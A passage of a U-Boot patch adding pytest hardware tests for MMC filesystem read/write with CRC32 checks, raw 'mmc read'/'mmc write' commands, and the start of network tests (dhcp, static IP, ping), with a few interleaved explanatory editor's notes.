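        # Mirrors the offset selection used by test_mmc_fatload_fatwrite
        alignment = int(buildconfig.get('config_sys_cacheline_size', 128))
        # Any non-zero multiple of the cache-line size below 1 KiB
        return random.randrange(alignment, 1024, alignment)

    # e.g. with a 128-byte cache line the offset is one of 128, 256, ..., 896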
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_ext4')
+def test_mmc_ext4ls(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    fs = 'ext4'
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            try:
+                partitions = devices[x][fs]
+            except:
+                print('No %s table on this device' % fs.upper())
+                continue
+
+            for part in partitions:
+                for y in mmc_modes:
+                    ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                    output = ubman.run_command(
+                        '%sls mmc %d:%s' % (fs, x, part)
+                    )
+                    if 'Unrecognized filesystem type' in output:
+                        partitions.remove(part)
+                        pytest.fail('Unrecognized filesystem')
+                    part_detect = 1
+
+    if not part_detect:
+        pytest.skip('No %s partition detected' % fs.upper())
+
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_ext4')
+@pytest.mark.buildconfigspec('ext4_write')
+@pytest.mark.buildconfigspec('cmd_memory')
+def test_mmc_ext4load_ext4write(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    fs = 'ext4'
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            try:
+                partitions = devices[x][fs]
+            except:
+                print('No %s table on this device' % fs.upper())
+                continue
+
+            for part in partitions:
+                for y in mmc_modes:
+                    ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                    part_detect = 1
+                    addr = utils.find_ram_base(ubman)
+                    devices[x]['addr_%d' % part] = addr
+                    size = random.randint(4, 1 * 1024 * 1024)
+                    devices[x]['size_%d' % part] = size
+                    # count CRC32
+                    output = ubman.run_command('crc32 %x %x' % (addr, size))
+                    m = re.search(r'==> (.+?)$', output)
+                    if not m:
+                        pytest.fail('CRC32 failed')
+                    expected_crc32 = m.group(1)
+                    devices[x]['expected_crc32_%d' % part] = expected_crc32
+
+                    # do write
+                    file = '%s_%d' % ('uboot_test', size)
+                    devices[x]['file_%d' % part] = file
+                    output = ubman.run_command(
+                        '%swrite mmc %d:%s %x /%s %x' % (fs, x, part, addr, file, size)
+                    )
+                    assert 'Unable to write' not in output
+                    assert 'Error' not in output
+                    assert 'overflow' not in output
+                    expected_text = '%d bytes written' % size
+                    assert expected_text in output
+
+                    offset = random.randrange(128, 1024, 128)
+                    output = ubman.run_command(
+                        '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file)
+                    )
+                    expected_text = '%d bytes read' % size
+                    assert expected_text in output
+
+                    output = ubman.run_command(
+                        'crc32 %x $filesize' % (addr + offset)
+                    )
+                    assert expected_crc32 in output
+
+    if not part_detect:
+        pytest.skip('No %s partition detected' % fs.upper())
+
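(Editor's note, not part of the patch.) The two write tests above also act as producers: they record the address, size, file name and CRC32 they used in the module-level devices list, and test_mmc_ext2load, test_mmc_load and test_mmc_save below only consume those entries. A compact sketch of that bookkeeping, using the same dictionary keys as the tests but hypothetical helper names:

    def record_write(devices, dev, part, addr, size, fname, crc):
        # What test_mmc_fatload_fatwrite / test_mmc_ext4load_ext4write store
        devices[dev]['addr_%d' % part] = addr
        devices[dev]['size_%d' % part] = size
        devices[dev]['file_%d' % part] = fname
        devices[dev]['expected_crc32_%d' % part] = crc

    def recall_write(devices, dev, part):
        # What test_mmc_ext2load / test_mmc_load / test_mmc_save read back later
        d = devices[dev]
        return (d['addr_%d' % part], d['size_%d' % part],
                d['file_%d' % part], d['expected_crc32_%d' % part])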
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_ext2')
+def test_mmc_ext2ls(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    fs = 'ext2'
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            try:
+                partitions = devices[x][fs]
+            except:
+                print('No %s table on this device' % fs.upper())
+                continue
+
+            for part in partitions:
+                for y in mmc_modes:
+                    ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                    part_detect = 1
+                    output = ubman.run_command(
+                        '%sls mmc %d:%s' % (fs, x, part)
+                    )
+                    if 'Unrecognized filesystem type' in output:
+                        partitions.remove(part)
+                        pytest.fail('Unrecognized filesystem')
+                    part_detect = 1
+
+    if not part_detect:
+        pytest.skip('No %s partition detected' % fs.upper())
+
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_ext2')
+@pytest.mark.buildconfigspec('cmd_ext4')
+@pytest.mark.buildconfigspec('ext4_write')
+@pytest.mark.buildconfigspec('cmd_memory')
+def test_mmc_ext2load(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    fs = 'ext2'
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            try:
+                partitions = devices[x][fs]
+            except:
+                print('No %s table on this device' % fs.upper())
+                continue
+
+            for part in partitions:
+                for y in mmc_modes:
+                    ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                    part_detect = 1
+                    addr = devices[x]['addr_%d' % part]
+                    size = devices[x]['size_%d' % part]
+                    expected_crc32 = devices[x]['expected_crc32_%d' % part]
+                    file = devices[x]['file_%d' % part]
+
+                    offset = random.randrange(128, 1024, 128)
+                    output = ubman.run_command(
+                        '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file)
+                    )
+                    expected_text = '%d bytes read' % size
+                    assert expected_text in output
+
+                    output = ubman.run_command(
+                        'crc32 %x $filesize' % (addr + offset)
+                    )
+                    assert expected_crc32 in output
+
+    if not part_detect:
+        pytest.skip('No %s partition detected' % fs.upper())
+
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_fs_generic')
+def test_mmc_ls(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            for fs in ['fat', 'ext4', 'ext2']:
+                try:
+                    partitions = devices[x][fs]
+                except:
+                    print('No %s table on this device' % fs.upper())
+                    continue
+
+                for part in partitions:
+                    for y in mmc_modes:
+                        ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                        part_detect = 1
+                        output = ubman.run_command('ls mmc %d:%s' % (x, part))
+                        if re.search(r'No \w+ table on this device', output):
+                            pytest.fail(
+                                '%s: Partition table not found %d' % (fs.upper(), x)
+                            )
+
+    if not part_detect:
+        pytest.skip('No partition detected')
+
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_fs_generic')
+def test_mmc_load(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            for fs in ['fat', 'ext4', 'ext2']:
+                try:
+                    partitions = devices[x][fs]
+                except:
+                    print('No %s table on this device' % fs.upper())
+                    continue
+
+                for part in partitions:
+                    for y in mmc_modes:
+                        ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                        part_detect = 1
+                        addr = devices[x]['addr_%d' % part]
+                        size = devices[x]['size_%d' % part]
+                        expected_crc32 = devices[x]['expected_crc32_%d' % part]
+                        file = devices[x]['file_%d' % part]
+
+                        offset = random.randrange(128, 1024, 128)
+                        output = ubman.run_command(
+                            'load mmc %d:%s %x /%s' % (x, part, addr + offset, file)
+                        )
+                        expected_text = '%d bytes read' % size
+                        assert expected_text in output
+
+                        output = ubman.run_command(
+                            'crc32 %x $filesize' % (addr + offset)
+                        )
+                        assert expected_crc32 in output
+
+    if not part_detect:
+        pytest.skip('No partition detected')
+
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_fs_generic')
+def test_mmc_save(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            for fs in ['fat', 'ext4', 'ext2']:
+                try:
+                    partitions = devices[x][fs]
+                except:
+                    print('No %s table on this device' % fs.upper())
+                    continue
+
+                for part in partitions:
+                    for y in mmc_modes:
+                        ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                        part_detect = 1
+                        addr = devices[x]['addr_%d' % part]
+                        size = 0
+                        file = devices[x]['file_%d' % part]
+
+                        offset = random.randrange(128, 1024, 128)
+                        output = ubman.run_command(
+                            'save mmc %d:%s %x /%s %d'
+                            % (x, part, addr + offset, file, size)
+                        )
+                        expected_text = '%d bytes written' % size
+                        assert expected_text in output
+
+    if not part_detect:
+        pytest.skip('No partition detected')
+
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_fat')
+@pytest.mark.buildconfigspec('cmd_memory')
+def test_mmc_fat_read_write_files(ubman):
+    test_mmc_list(ubman)
+    test_mmc_dev(ubman)
+    test_mmcinfo(ubman)
+    test_mmc_part(ubman)
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    fs = 'fat'
+
+    # Number of files to be written/read in MMC card
+    num_files = 100
+
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            try:
+                partitions = devices[x][fs]
+            except:
+                print('No %s table on this device' % fs.upper())
+                continue
+
+            for part in partitions:
+                for y in mmc_modes:
+                    ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                    part_detect = 1
+                    addr = utils.find_ram_base(ubman)
+                    count_f = 0
+                    addr_l = []
+                    size_l = []
+                    file_l = []
+                    crc32_l = []
+                    offset_l = []
+                    addr_l.append(addr)
+
+                    while count_f < num_files:
+                        size_l.append(random.randint(4, 1 * 1024 * 1024))
+
+                        # CRC32 count
+                        output = ubman.run_command(
+                            'crc32 %x %x' % (addr_l[count_f], size_l[count_f])
+                        )
+                        m = re.search(r'==> (.+?)$', output)
+                        if not m:
+                            pytest.fail('CRC32 failed')
+                        crc32_l.append(m.group(1))
+
+                        # Write operation
+                        file_l.append(
+                            '%s_%d_%d' % ('uboot_test', count_f, size_l[count_f])
+                        )
+                        output = ubman.run_command(
+                            '%swrite mmc %d:%s %x %s %x'
+                            % (
+                                fs,
+                                x,
+                                part,
+                                addr_l[count_f],
+                                file_l[count_f],
+                                size_l[count_f],
+                            )
+                        )
+                        assert 'Unable to write' not in output
+                        assert 'Error' not in output
+                        assert 'overflow' not in output
+                        expected_text = '%d bytes written' % size_l[count_f]
+                        assert expected_text in output
+
+                        addr_l.append(addr_l[count_f] + size_l[count_f] + 1048576)
+                        count_f += 1
+
+                    count_f = 0
+                    while count_f < num_files:
+                        alignment = int(
+                            ubman.config.buildconfig.get(
+                                'config_sys_cacheline_size', 128
+                            )
+                        )
+                        offset_l.append(random.randrange(alignment, 1024, alignment))
+
+                        # Read operation
+                        output = ubman.run_command(
+                            '%sload mmc %d:%s %x %s'
+                            % (
+                                fs,
+                                x,
+                                part,
+                                addr_l[count_f] + offset_l[count_f],
+                                file_l[count_f],
+                            )
+                        )
+                        assert 'Invalid FAT entry' not in output
+                        assert 'Unable to read file' not in output
+                        assert 'Misaligned buffer address' not in output
+                        expected_text = '%d bytes read' % size_l[count_f]
+                        assert expected_text in output
+
+                        output = ubman.run_command(
+                            'crc32 %x $filesize' % (addr_l[count_f] + offset_l[count_f])
+                        )
+                        assert crc32_l[count_f] in output
+
+                        count_f += 1
+
+    if not part_detect:
+        pytest.skip('No %s partition detected' % fs.upper())
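(Editor's note, not part of the patch.) test_mmc_fat_read_write_files above lays its 100 source buffers out back to back, adding a 1 MiB (1048576-byte) guard after each file, and reads each file back at an offset of less than 1 KiB from its own buffer. Because the guard is larger than any possible read-back offset, no read can spill into the next file's window. A small self-check of that layout, with an assumed base address of 0x10000000:

    import random

    def layout_addresses(base, sizes, guard=1048576):
        # Reproduce the source-buffer layout used by test_mmc_fat_read_write_files
        addrs = [base]
        for size in sizes:
            addrs.append(addrs[-1] + size + guard)
        return addrs

    sizes = [random.randint(4, 1 * 1024 * 1024) for _ in range(100)]
    addrs = layout_addresses(0x10000000, sizes)
    # Read-back offsets stay below 1 KiB, so addr + offset + size never
    # reaches the next window
    assert all(addrs[i] + 1023 + sizes[i] < addrs[i + 1] for i in range(len(sizes)))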
diff --git a/test/py/tests/test_mmc_rd.py b/test/py/tests/test_mmc_rd.py
new file mode 100644
index 00000000000..cd1e299aa9d
--- /dev/null
+++ b/test/py/tests/test_mmc_rd.py
@@ -0,0 +1,286 @@
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
+
+# Test U-Boot's "mmc read" command. The test reads data from the eMMC or SD
+# card, and validates that no errors occurred, and that the expected data was
+# read if the test configuration contains a CRC of the expected data.
+
+import pytest
+import time
+import utils
+
+"""
+This test relies on boardenv_* to contain configuration values to define
+which MMC devices should be tested. For example:
+
+# Configuration data for test_mmc_dev, test_mmc_rescan, test_mmc_info; defines
+# whole MMC devices that mmc dev/rescan/info commands may operate upon.
+env__mmc_dev_configs = (
+    {
+        'fixture_id': 'emmc-boot0',
+        'is_emmc': True,
+        'devid': 0,
+        'partid': 1,
+        'info_device': ???,
+        'info_speed': ???,
+        'info_mode': ???,
+        'info_buswidth': ???,
+    },
+    {
+        'fixture_id': 'emmc-boot1',
+        'is_emmc': True,
+        'devid': 0,
+        'partid': 2,
+        'info_device': ???,
+        'info_speed': ???,
+        'info_mode': ???,
+        'info_buswidth': ???,
+    },
+    {
+        'fixture_id': 'emmc-data',
+        'is_emmc': True,
+        'devid': 0,
+        'partid': 0,
+        'info_device': ???,
+        'info_speed': ???,
+        'info_mode': ???,
+        'info_buswidth': ???,
+    },
+    {
+        'fixture_id': 'sd',
+        'is_emmc': False,
+        'devid': 1,
+        'partid': None,
+        'info_device': ???,
+        'info_speed': ???,
+        'info_mode': ???,
+        'info_buswidth': ???,
+ }, +) + +# Configuration data for test_mmc_rd; defines regions of the MMC (entire +# devices, or ranges of sectors) which can be read: +env__mmc_rd_configs = ( + { + 'fixture_id': 'emmc-boot0', + 'is_emmc': True, + 'devid': 0, + 'partid': 1, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-boot1', + 'is_emmc': True, + 'devid': 0, + 'partid': 2, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-data', + 'is_emmc': True, + 'devid': 0, + 'partid': 0, + 'sector': 0x10, + 'count': 0x1000, + }, + { + 'fixture_id': 'sd-mbr', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0, + 'count': 1, + 'crc32': '8f6ecf0d', + }, + { + 'fixture_id': 'sd-large', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0x10, + 'count': 0x1000, + }, +) +""" + +def mmc_dev(ubman, is_emmc, devid, partid): + """Run the "mmc dev" command. + + Args: + ubman: A U-Boot console connection. + is_emmc: Whether the device is eMMC + devid: Device ID + partid: Partition ID + + Returns: + Nothing. + """ + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = ubman.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = '(part %d)' % partid + else: + partid_response = '' + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(ubman, env__mmc_dev_config): + """Test the "mmc dev" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(ubman, env__mmc_dev_config): + """Test the "mmc rescan" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + + # Rescan MMC device + cmd = 'mmc rescan' + response = ubman.run_command(cmd) + assert 'no card present' not in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(ubman, env__mmc_dev_config): + """Test the "mmc info" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. 
+ """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + info_device = env__mmc_dev_config['info_device'] + info_speed = env__mmc_dev_config['info_speed'] + info_mode = env__mmc_dev_config['info_mode'] + info_buswidth = env__mmc_dev_config['info_buswidth'] + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + + # Read MMC device information + cmd = 'mmc info' + response = ubman.run_command(cmd) + good_response = "Device: %s" % info_device + assert good_response in response + good_response = "Bus Speed: %s" % info_speed + assert good_response in response + good_response = "Mode: %s" % info_mode + assert good_response in response + good_response = "Bus Width: %s" % info_buswidth + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rd(ubman, env__mmc_rd_config): + """Test the "mmc read" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_rd_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_rd_config['is_emmc'] + devid = env__mmc_rd_config['devid'] + partid = env__mmc_rd_config.get('partid', 0) + sector = env__mmc_rd_config.get('sector', 0) + count_sectors = env__mmc_rd_config.get('count', 1) + expected_crc32 = env__mmc_rd_config.get('crc32', None) + read_duration_max = env__mmc_rd_config.get('read_duration_max', 0) + + count_bytes = count_sectors * 512 + bcfg = ubman.config.buildconfig + has_cmd_memory = bcfg.get('config_cmd_memory', 'n') == 'y' + has_cmd_crc32 = bcfg.get('config_cmd_crc32', 'n') == 'y' + ram_base = utils.find_ram_base(ubman) + addr = '0x%08x' % ram_base + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + + # Clear target RAM + if expected_crc32: + if has_cmd_memory and has_cmd_crc32: + cmd = 'mw.b %s 0 0x%x' % (addr, count_bytes) + ubman.run_command(cmd) + + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = ubman.run_command(cmd) + assert expected_crc32 not in response + else: + ubman.log.warning( + 'CONFIG_CMD_MEMORY or CONFIG_CMD_CRC32 != y: Skipping RAM clear') + + # Read data + cmd = 'mmc read %s %x %x' % (addr, sector, count_sectors) + tstart = time.time() + response = ubman.run_command(cmd) + tend = time.time() + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % ( + devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Check target RAM + if expected_crc32: + if has_cmd_crc32: + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = ubman.run_command(cmd) + assert expected_crc32 in response + else: + ubman.log.warning('CONFIG_CMD_CRC32 != y: Skipping check') + + # Check if the command did not take too long + if read_duration_max: + elapsed = tend - tstart + ubman.log.info('Reading %d bytes took %f seconds' % + (count_bytes, elapsed)) + assert elapsed <= (read_duration_max - 0.01) diff --git a/test/py/tests/test_mmc_wr.py b/test/py/tests/test_mmc_wr.py new file mode 100644 index 00000000000..41a75f885e1 --- /dev/null +++ b/test/py/tests/test_mmc_wr.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> + +# Test U-Boot's "mmc write" command. The test generates random data, writes it +# to the eMMC or SD card, then reads it back and performs a comparison. 
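(Editor's note, not part of the patch.) The test below needs two non-overlapping RAM buffers: the random source data must stay intact while the written sectors are read back into a second buffer placed immediately after it, so that cmp.b can compare both. The addresses are derived exactly as in the test; the helper name and example values are illustrative only.

    def mmc_wr_buffers(ram_base, count_sectors):
        # Source/destination layout used by the mmc write test
        count_bytes = count_sectors * 512    # MMC blocks are 512 bytes
        src_addr = ram_base                  # filled by the 'random' command
        dst_addr = ram_base + count_bytes    # target of the 'mmc read' back
        return src_addr, dst_addr, count_bytes

    # e.g. ram_base 0x10000000 and 100 sectors -> src 0x10000000, dst 0x1000c800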
+ +import pytest +import utils + +""" +This test relies on boardenv_* to containing configuration values to define +which MMC devices should be tested. For example: + +env__mmc_wr_configs = ( + { + "fixture_id": "emmc-boot0", + "is_emmc": True, + "devid": 1, + "partid": 1, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, + { + "fixture_id": "emmc-boot1", + "is_emmc": True, + "devid": 1, + "partid": 2, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, +) + +""" + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_random') +def test_mmc_wr(ubman, env__mmc_wr_config): + """Test the "mmc write" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_wr_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_wr_config['is_emmc'] + devid = env__mmc_wr_config['devid'] + partid = env__mmc_wr_config.get('partid', 0) + sector = env__mmc_wr_config.get('sector', 0) + count_sectors = env__mmc_wr_config.get('count', 1) + test_iterations = env__mmc_wr_config.get('test_iterations', 1) + + + count_bytes = count_sectors * 512 + bcfg = ubman.config.buildconfig + ram_base = utils.find_ram_base(ubman) + src_addr = '0x%08x' % ram_base + dst_addr = '0x%08x' % (ram_base + count_bytes) + + + for i in range(test_iterations): + # Generate random data + cmd = 'random %s %x' % (src_addr, count_bytes) + response = ubman.run_command(cmd) + good_response = '%d bytes filled with random data' % (count_bytes) + assert good_response in response + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = ubman.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = "(part %d)" % partid + else: + partid_response = "" + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + + # Write data + cmd = 'mmc write %s %x %x' % (src_addr, sector, count_sectors) + response = ubman.run_command(cmd) + good_response = 'MMC write: dev # %d, block # %d, count %d ... %d blocks written: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Read data + cmd = 'mmc read %s %x %x' % (dst_addr, sector, count_sectors) + response = ubman.run_command(cmd) + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Compare src and dst data + cmd = 'cmp.b %s %s %x' % (src_addr, dst_addr, count_bytes) + response = ubman.run_command(cmd) + good_response = 'Total of %d byte(s) were the same' % (count_bytes) + assert good_response in response diff --git a/test/py/tests/test_net.py b/test/py/tests/test_net.py new file mode 100644 index 00000000000..4732e4b57f8 --- /dev/null +++ b/test/py/tests/test_net.py @@ -0,0 +1,460 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test various network-related functionality, such as the dhcp, ping, and +# tftpboot commands. + +import pytest +import utils +import uuid +import datetime +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, this test +will be automatically skipped. 
+ +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# False or omitted if a DHCP server is attached to the network, and dhcp abort +# case should be tested. +# If DHCP abort testing is not possible or desired, set this variable to True. +# For example: On some setup, dhcp is too fast and this case may not work. +env__dhcp_abort_test_skip = True + +# True if a DHCPv6 server is attached to the network, and should be tested. +# If DHCPv6 testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp6_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__net_tftp_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', + 'timeout': 50000, + 'fnu': 'ubtest-upload.bin', +} + +# Details regarding a file that may be read from a NFS server. This variable +# may be omitted or set to None if NFS testing is not possible or desired. +env__net_nfs_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', +} + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if PXE testing is not possible or desired. +env__net_pxe_readable_file = { + 'fn': 'default', + 'addr': 0x2000000, + 'size': 74, + 'timeout': 50000, + 'pattern': 'Linux', +} + +# True if a router advertisement service is connected to the network, and should +# be tested. If router advertisement testing is not possible or desired, this +variable may be omitted or set to False. +env__router_on_net = True +""" + +net_set_up = False +net6_set_up = False + + +@pytest.mark.buildconfigspec('cmd_net') +def test_net_pre_commands(ubman): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. + """ + + init_usb = ubman.config.env.get('env__net_uses_usb', False) + if init_usb: + ubman.run_command('usb start') + + init_pci = ubman.config.env.get('env__net_uses_pci', False) + if init_pci: + ubman.run_command('pci enum') + + ubman.run_command('net list') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_net_dhcp(ubman): + """Test the dhcp command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. 
+ """ + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('cmd_mii') +def test_net_dhcp_abort(ubman): + """Test the dhcp command by pressing ctrl+c in the middle of dhcp request + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + if ubman.config.env.get('env__dhcp_abort_test_skip', True): + pytest.skip('DHCP abort test is not enabled!') + + ubman.run_command('setenv autoload no') + + # Phy reset before running dhcp command + output = ubman.run_command('mii device') + if not re.search(r"Current device: '(.+?)'", output): + pytest.skip('PHY device does not exist!') + eth_num = re.search(r"Current device: '(.+?)'", output).groups()[0] + ubman.run_command(f'mii device {eth_num}') + output = ubman.run_command('mii info') + eth_addr = hex(int(re.search(r'PHY (.+?):', output).groups()[0], 16)) + ubman.run_command(f'mii modify {eth_addr} 0 0x8000 0x8000') + + ubman.run_command('dhcp', wait_for_prompt=False) + try: + ubman.wait_for('Waiting for PHY auto negotiation to complete') + except: + pytest.skip('Timeout waiting for PHY auto negotiation to complete') + + ubman.wait_for('done') + + try: + # Sending Ctrl-C + output = ubman.run_command( + chr(3), wait_for_echo=False, send_nl=False + ) + assert 'TIMEOUT' not in output + assert 'DHCP client bound to address ' not in output + assert 'Abort' in output + finally: + # Provide a time to recover from Abort - if it is not performed + # There is message like: ethernet@ff0e0000: No link. + ubman.run_command('sleep 1') + # Run the dhcp test to setup the network configuration + test_net_dhcp(ubman) + +@pytest.mark.buildconfigspec('cmd_dhcp6') +def test_net_dhcp6(ubman): + """Test the dhcp6 command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp6 = ubman.config.env.get('env__net_dhcp6_server', False) + if not test_dhcp6: + pytest.skip('No DHCP6 server available') + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp6') + assert 'DHCP6 client bound to ' in output + + global net6_set_up + net6_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_net_setup_static(ubman): + """Set up a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No static network configuration is defined') + + for (var, val) in env_vars: + ubman.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_ping') +def test_net_ping(ubman): + """Test the ping command. + + The $serverip (as set up by either test_net_dhcp or test_net_setup_static) + is pinged. The test validates that the host is alive, as reported by the + ping command's output. 
